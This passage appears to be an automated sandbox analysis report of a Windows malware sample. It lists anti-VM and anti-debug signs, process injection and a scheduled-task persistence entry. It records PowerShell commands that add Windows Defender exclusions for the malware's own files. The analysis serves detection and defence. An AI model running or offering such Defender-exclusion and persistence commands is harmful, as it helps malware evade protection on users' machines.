                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: PEbZthAqV9.exe PID: 7412, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: myTuDsvNcebev.exe PID: 8016, type: MEMORYSTR
                  Delayed program exit found
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_0040E18D Sleep,ExitProcess,18_2_0040E18D
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeMemory allocated: C10000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeMemory allocated: 2D50000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeMemory allocated: 29F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeMemory allocated: 7AF0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeMemory allocated: 8AF0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeMemory allocated: 8CA0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeMemory allocated: 9CA0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeMemory allocated: 11E0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeMemory allocated: 2B60000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeMemory allocated: 4B60000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeMemory allocated: 7650000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeMemory allocated: 8650000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeMemory allocated: 87F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeMemory allocated: 97F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,18_2_004186FE
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7656Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2003Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7302Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2394Jump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeWindow / User API: threadDelayed 7316Jump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeWindow / User API: threadDelayed 2676Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeAPI coverage: 5.2 %
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exe TID: 7432Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7920Thread sleep time: -12912720851596678s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7960Thread sleep time: -13835058055282155s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exe TID: 7984Thread sleep count: 7316 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exe TID: 7984Thread sleep time: -21948000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exe TID: 7984Thread sleep count: 2676 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exe TID: 7984Thread sleep time: -8028000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe TID: 8036Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,18_2_0041A01B
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,18_2_0040B28E
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,18_2_0040838E
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,18_2_004087A0
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,18_2_00407848
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_004068CD FindFirstFileW,FindNextFileW,18_2_004068CD
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,18_2_0040AA71
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,18_2_00417AAB
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,18_2_0040AC78
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,18_2_00406D28
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: PEbZthAqV9.exe, 00000008.00000002.4179854421.0000000001257000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
                  Source: PEbZthAqV9.exe, 00000008.00000002.4180646269.00000000012C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: PEbZthAqV9.exe, 00000008.00000002.4180646269.00000000012C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW,
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_004327AE
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_0041A8DA LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,18_2_0041A8DA
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_004407B5 mov eax, dword ptr fs:[00000030h]18_2_004407B5
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_00410763 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,18_2_00410763
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_004327AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_004327AE
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_004328FC SetUnhandledExceptionFilter,18_2_004328FC
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_004398AC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_004398AC
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_00432D5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_00432D5C
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Adds a directory exclusion to Windows Defender
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PEbZthAqV9.exe"
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PEbZthAqV9.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"Jump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeMemory written: C:\Users\user\Desktop\PEbZthAqV9.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe18_2_00410B5C
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_004175E1 mouse_event,18_2_004175E1
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PEbZthAqV9.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\myTuDsvNcebev" /XML "C:\Users\user\AppData\Local\Temp\tmp53D2.tmp"Jump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeProcess created: C:\Users\user\Desktop\PEbZthAqV9.exe "C:\Users\user\Desktop\PEbZthAqV9.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\myTuDsvNcebev" /XML "C:\Users\user\AppData\Local\Temp\tmp7C97.tmp"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess created: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess created: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess created: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess created: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeProcess created: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"Jump to behavior
                  Source: PEbZthAqV9.exe, 00000008.00000002.4180380801.00000000012AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerc
                  Source: PEbZthAqV9.exe, 00000008.00000002.4180380801.00000000012AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: PEbZthAqV9.exe, 00000008.00000002.4180380801.00000000012AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managert
                  Source: PEbZthAqV9.exe, 00000008.00000002.4180380801.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, PEbZthAqV9.exe, 00000008.00000002.4179854421.0000000001257000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: 18_2_004329DA cpuid 18_2_004329DA
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: EnumSystemLocalesW,18_2_0044F17B
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: EnumSystemLocalesW,18_2_0044F130
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: EnumSystemLocalesW,18_2_0044F216
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,18_2_0044F2A3
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: GetLocaleInfoA,18_2_0040E2BB
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: GetLocaleInfoW,18_2_0044F4F3
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,18_2_0044F61C
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: GetLocaleInfoW,18_2_0044F723
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,18_2_0044F7F0
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: EnumSystemLocalesW,18_2_00445914
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: GetLocaleInfoW,18_2_00445E1C
                  Source: C:\Users\user\AppData\Roaming\myTuDsvNcebev.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,18_2_0044EEB8
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Users\user\Desktop\PEbZthAqV9.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\PEbZthAqV9.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
